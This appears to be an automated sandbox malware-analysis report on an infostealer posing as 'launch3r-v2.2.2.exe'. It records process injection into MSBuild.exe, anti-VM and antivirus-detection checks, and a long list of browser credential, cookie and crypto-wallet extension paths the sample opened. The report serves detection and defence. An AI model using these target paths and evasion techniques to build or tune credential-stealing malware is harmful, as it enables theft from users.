            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: launch3r-v2.2.2.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: launch3r-v2.2.2.exeStatic file information: File size 1577984 > 1048576
            Source: launch3r-v2.2.2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: launch3r-v2.2.2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: launch3r-v2.2.2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: launch3r-v2.2.2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: launch3r-v2.2.2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: launch3r-v2.2.2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: launch3r-v2.2.2.exeStatic PE information: section name: .B5
            Source: launch3r-v2.2.2.exeStatic PE information: section name: .gxfg
            Source: launch3r-v2.2.2.exeStatic PE information: section name: .retplne
            Source: launch3r-v2.2.2.exeStatic PE information: section name: _RDATA
            Source: launch3r-v2.2.2.exeStatic PE information: section name: .jss
            Source: launch3r-v2.2.2.exeStatic PE information: section name: .jss
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D1182F push rsp; iretd 0_2_00007FF692D11831
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D08434 pushfq ; ret 0_2_00007FF692D08438
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D11806 push rsp; iretd 0_2_00007FF692D1180F
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0741E pushfq ; ret 0_2_00007FF692D07422
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D117F0 push rsp; iretd 0_2_00007FF692D117F2
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D07392 pushfq ; ret 0_2_00007FF692D07395
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D117B2 push rsp; iretd 0_2_00007FF692D117B4
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692CF37B5 pushfq ; ret 0_2_00007FF692CF37B9
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0776B pushfq ; ret 0_2_00007FF692D0776E
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D07D32 pushfq ; ret 0_2_00007FF692D07D36
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692CF3CD4 pushfq ; ret 0_2_00007FF692CF3CD8
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D07CCC pushfq ; ret 0_2_00007FF692D07CD0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D118F3 push rsp; iretd 0_2_00007FF692D118F5
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D084C2 pushfq ; ret 0_2_00007FF692D084C6
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D09C96 pushfq ; ret 0_2_00007FF692D09C97
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D08C5F pushfq ; ret 0_2_00007FF692D08C63
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D11874 push rsp; iretd 0_2_00007FF692D1180F
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0705E pushfq ; ret 0_2_00007FF692D07062
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D07E2B pushfq ; ret 0_2_00007FF692D07E2F
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D11A08 pushfq ; ret 0_2_00007FF692D11A0C
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692CF3DF1 pushfq ; ret 0_2_00007FF692CF3DF5
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D065E5 pushfq ; ret 0_2_00007FF692D065E9
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D081CB pushfq ; ret 0_2_00007FF692D081CF
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D06D95 pushfq ; ret 0_2_00007FF692D06D99
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D099A5 pushfq ; ret 0_2_00007FF692D099A6
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D06582 pushfq ; iretd 0_2_00007FF692D06586
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D119AF push rsp; iretd 0_2_00007FF692D119B1
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692CF397B pushfq ; ret 0_2_00007FF692CF397E
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D07598 pushfq ; ret 0_2_00007FF692D0759C
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D07EFB pushfq ; ret 0_2_00007FF692D07EFE
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692CF3719 pushfq ; ret 0_2_00007FF692CF371D
            Source: launch3r-v2.2.2.exeStatic PE information: section name: .text entropy: 7.049880263957565
            Source: launch3r-v2.2.2.exeStatic PE information: section name: .B5 entropy: 6.940675920308152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6369Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6028Thread sleep time: -210000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8144Thread sleep count: 6369 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeLast function: Thread delayed
            Source: MSBuild.exe, 00000003.00000002.2513180833.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2513525445.0000000000B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: MSBuild.exe, 00000003.00000002.2513525445.0000000000B62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_3-22207
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00448BF0 LdrInitializeThunk,3_2_00448BF0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D90E14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF692D90E14
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D89384 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF692D89384
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D90E14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF692D90E14

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000Jump to behavior
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 451000Jump to behavior
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000Jump to behavior
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 90D008Jump to behavior
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: EnumSystemLocalesW,0_2_00007FF692D9D808
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: EnumSystemLocalesW,0_2_00007FF692D9D4F0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: EnumSystemLocalesW,0_2_00007FF692D98200
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF692D9D1F0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF692D9DA90
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: GetLocaleInfoW,0_2_00007FF692D97A88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D8A19C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF692D8A19C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: MSBuild.exe, 00000003.00000002.2513864842.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2513296452.0000000000B49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000002.2515196932.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7396, type: MEMORYSTR
            Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.2512778341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
